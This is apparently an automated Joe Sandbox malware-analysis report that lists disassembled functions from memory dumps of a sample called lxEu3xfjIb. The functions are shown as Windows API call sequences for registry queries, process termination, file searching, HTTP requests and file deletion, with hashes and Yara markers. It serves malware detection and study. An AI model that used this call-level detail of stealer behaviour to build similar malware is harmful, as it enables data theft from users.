                                                • Part of subcall function 0484A377: LocalFree.KERNEL32(048416F6), ref: 0484A447
                                                • Part of subcall function 0484A377: CloseHandle.KERNEL32(000000FF), ref: 0484A451
                                              • DeleteFileA.KERNEL32(00000000), ref: 04841756
                                              • memset.MSVCRT ref: 0484177D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                              • String ID:
                                              • API String ID: 3885987321-0
                                              • Opcode ID: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
                                              • Instruction ID: 71a52272b9adc187cc44fb0632e0e780ba3f25f531c2f71bb1ed0fdcb05e1171
                                              • Opcode Fuzzy Hash: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
                                              • Instruction Fuzzy Hash: 375143B1D4021857DB59FB64DC94FED73389F54305F404BE9AA09A20A0EFB06B88CF56
                                              Function 004149D0 Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcatA.KERNEL32(?,02CA5298,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00414A51
                                              • lstrcatA.KERNEL32(?,?), ref: 00414A70
                                              • lstrcatA.KERNEL32(?,?), ref: 00414A84
                                              • lstrcatA.KERNEL32(?,02CA0E20), ref: 00414A97
                                              • lstrcatA.KERNEL32(?,?), ref: 00414AAB
                                              • lstrcatA.KERNEL32(?,02CA5FB0), ref: 00414ABF
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                • Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                                • Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                                • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
                                                • Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                              • String ID:
                                              • API String ID: 167551676-0
                                              • Opcode ID: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
                                              • Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
                                              • Opcode Fuzzy Hash: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
                                              • Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99
                                              Function 0041856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                              • wsprintfA.USER32 ref: 004185E9
                                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                              • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • RegQueryValueExA.ADVAPI32(00000000,02CA5A18,00000000,000F003F,?,00000400), ref: 0041867C
                                              • lstrlenA.KERNEL32(?), ref: 00418691
                                              • RegQueryValueExA.ADVAPI32(00000000,02CA5A00,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00418798
                                              • RegCloseKey.ADVAPI32(00000000), ref: 004187AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                              • String ID: %s\%s
                                              • API String ID: 3896182533-4073750446
                                              • Opcode ID: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                              • Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
                                              • Opcode Fuzzy Hash: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                              • Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98
                                              Function 004199A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
                                              • Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
                                              • Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
                                              • CloseHandle.KERNEL32(00000000), ref: 00419A79
                                              • CloseHandle.KERNEL32(0040A056), ref: 00419A88
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                              • String ID:
                                              • API String ID: 2696918072-0
                                              • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                              • Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
                                              • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                              • Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51
                                              Function 04859C07 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04859C2C
                                              • Process32First.KERNEL32(0484A2BD,00000128), ref: 04859C40
                                              • Process32Next.KERNEL32(0484A2BD,00000128), ref: 04859C59
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 04859CB5
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 04859CD3
                                              • CloseHandle.KERNEL32(00000000), ref: 04859CE0
                                              • CloseHandle.KERNEL32(0484A2BD), ref: 04859CEF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                              • String ID:
                                              • API String ID: 2696918072-0
                                              • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                              • Instruction ID: 8c06c1e13651cbed66805d1922ab922f26e7698aeb969108356ef5582b55507f
                                              • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                              • Instruction Fuzzy Hash: D2212CB4904218EBDB21DF55CC88BEDB7B9BB48304F0046C9E50AA72A0D774AF84CF91
                                              Function 04844A67 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AA1
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AB8
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844ACF
                                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04844AF0
                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 04844B00
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ??2@$CrackInternetlstrlen
                                              • String ID: <
                                              • API String ID: 1683549937-4251816714
                                              • Opcode ID: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
                                              • Instruction ID: 30dad2efaf75c80d879109e50924b8eeabceb9c94f60d9e4a01c64df5ac23061
                                              • Opcode Fuzzy Hash: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
                                              • Instruction Fuzzy Hash: B1213E71D00219EBDF14EFA8EC49ADD7B74FF44320F108225E925A7290EB706A09CF91
                                              Function 00417820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                              • HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                              • RegOpenKeyExA.ADVAPI32(80000002,02CA14B8,00000000,00020119,00000000), ref: 0041786D
                                              • RegQueryValueExA.ADVAPI32(00000000,02CA5958,00000000,00000000,?,000000FF), ref: 0041788E
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00417898
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID: Windows 11
                                              • API String ID: 3466090806-2517555085
                                              • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                              • Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
                                              • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                              • Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55
                                              Function 04857A87 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 04857A9B
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04857AA2
                                              • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,00000000), ref: 04857AD4
                                              • RegQueryValueExA.ADVAPI32(00000000,006D6E34,00000000,00000000,?,000000FF), ref: 04857AF5
                                              • RegCloseKey.ADVAPI32(00000000), ref: 04857AFF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID: Windows 11
                                              • API String ID: 3225020163-2517555085
                                              • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                              • Instruction ID: a0fdc58a8b4f32eaed5253db43fb313269d781471097a244597acf5989dfa742
                                              • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                              • Instruction Fuzzy Hash: 99016279E05309BBEB00DBE4ED49F6D77B9EB48701F008596FA05E7290E770AA40CB91
                                              Function 004178B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
                                              • HeapAlloc.KERNEL32(00000000), ref: 004178CB
                                              • RegOpenKeyExA.ADVAPI32(80000002,02CA14B8,00000000,00020119,00417849), ref: 004178EB
                                              • RegQueryValueExA.ADVAPI32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
                                              • RegCloseKey.ADVAPI32(00417849), ref: 00417914
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID: CurrentBuildNumber
                                              • API String ID: 3466090806-1022791448
                                              • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                              • Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
                                              • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                              • Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91
                                              Function 00419470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
                                              • GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
                                              • CloseHandle.KERNEL32(000000FF), ref: 004194B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSize
                                              • String ID: >=A$>=A
                                              • API String ID: 1378416451-3536956848
                                              • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                              • Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
                                              • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                              • Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85
                                              Function 04847597 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 04847601
                                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 04847678
                                              • StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 048476D4
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04847719
                                              • HeapFree.KERNEL32(00000000), ref: 04847720
                                                • Part of subcall function 048494F7: vsprintf_s.MSVCRT ref: 04849512
                                              • task.LIBCPMTD ref: 0484781C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                              • String ID:
                                              • API String ID: 700816787-0
                                              • Opcode ID: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
                                              • Instruction ID: 0ff3a6cfb9e3474136e89ea835055250f8e79c8da66480cc17ad51842c018aa4
                                              • Opcode Fuzzy Hash: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
                                              • Instruction Fuzzy Hash: 9361FFB590026C9BEB24DF54CC54FD9B7B8BF84304F0086E9E649A6140EBB0ABC5CF91
                                              Function 04855777 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 04846537: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 04846598
                                                • Part of subcall function 04846537: StrCmpCA.SHLWAPI(?,006D6E80), ref: 048465BA
                                                • Part of subcall function 04846537: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048465EC
                                                • Part of subcall function 04846537: HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 0484663C
                                                • Part of subcall function 04846537: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04846676
                                                • Part of subcall function 04846537: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04846688
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 048557CF
                                              • lstrlen.KERNEL32(00000000), ref: 048557E6
                                                • Part of subcall function 04859227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 04859249
                                              • StrStrA.SHLWAPI(00000000,00000000), ref: 0485581B
                                              • lstrlen.KERNEL32(00000000), ref: 0485583A
                                              • strtok.MSVCRT(00000000,?), ref: 04855855
                                              • lstrlen.KERNEL32(00000000), ref: 04855865
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                              • String ID:
                                              • API String ID: 3532888709-0
                                              • Opcode ID: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
                                              • Instruction ID: 0b566b3276b9476acc778449b2a4a05fbb573534cbf5f0085815115b224981cd
                                              • Opcode Fuzzy Hash: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
                                              • Instruction Fuzzy Hash: D351FB30900248ABEB18FF68DD95AFD7735AF60209F504B68DC05A65B0EBB47B48CB52
                                              Function 048575B7 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                              Download Yara Rule
                                              APIs
                                              • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 048575C5
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,048577F4,004205C5), ref: 04857603
                                              • memset.MSVCRT ref: 04857651
                                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 048577A5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: OpenProcesslstrcpymemset
                                              • String ID:
                                              • API String ID: 224852652-0
                                              • Opcode ID: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
                                              • Instruction ID: b0d83c9e566ef610a204bd234e6555664956ba5b257809a4954f132e3390a433
                                              • Opcode Fuzzy Hash: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
                                              • Instruction Fuzzy Hash: CE5172B0D00218DFDB14EF98DC94BEDB7B4AF44305F108AA9D915A7190EB747A84CF59
                                              Function 00414300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 00414325
                                              • RegOpenKeyExA.ADVAPI32(80000001,02CA61B0,00000000,00020119,?), ref: 00414344
                                              • RegQueryValueExA.ADVAPI32(?,02CA6720,00000000,00000000,00000000,000000FF), ref: 00414368
                                              • RegCloseKey.ADVAPI32(?), ref: 00414372
                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
                                              • lstrcatA.KERNEL32(?,02CA6660), ref: 004143AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                              • String ID:
                                              • API String ID: 2623679115-0
                                              • Opcode ID: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                              • Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
                                              • Opcode Fuzzy Hash: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                              • Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1
                                              Function 04854567 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 0485458C
                                              • RegOpenKeyExA.ADVAPI32(80000001,006D6ED8,00000000,00020119,?), ref: 048545AB
                                              • RegQueryValueExA.ADVAPI32(?,006D6AD4,00000000,00000000,00000000,000000FF), ref: 048545CF
                                              • RegCloseKey.ADVAPI32(?), ref: 048545D9
                                              • lstrcat.KERNEL32(?,00000000), ref: 048545FE
                                              • lstrcat.KERNEL32(?,006D6B68), ref: 04854612
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                              • String ID:
                                              • API String ID: 2623679115-0
                                              • Opcode ID: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
                                              • Instruction ID: 18649c3734d0436562502172dc53af480e86cb602405a971a0f93d6c4b2568a0
                                              • Opcode Fuzzy Hash: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
                                              • Instruction Fuzzy Hash: 1C419B72D0010C6BDB14EBA4DC89FEE7739AB88700F044A5DB61597190EBB577C88BE2
                                              Function 004137B0 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • strtok_s.MSVCRT ref: 004137D8
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • strtok_s.MSVCRT ref: 00413921
                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02C9D528,?,004210F4,?,00000000), ref: 0041AB3B
                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
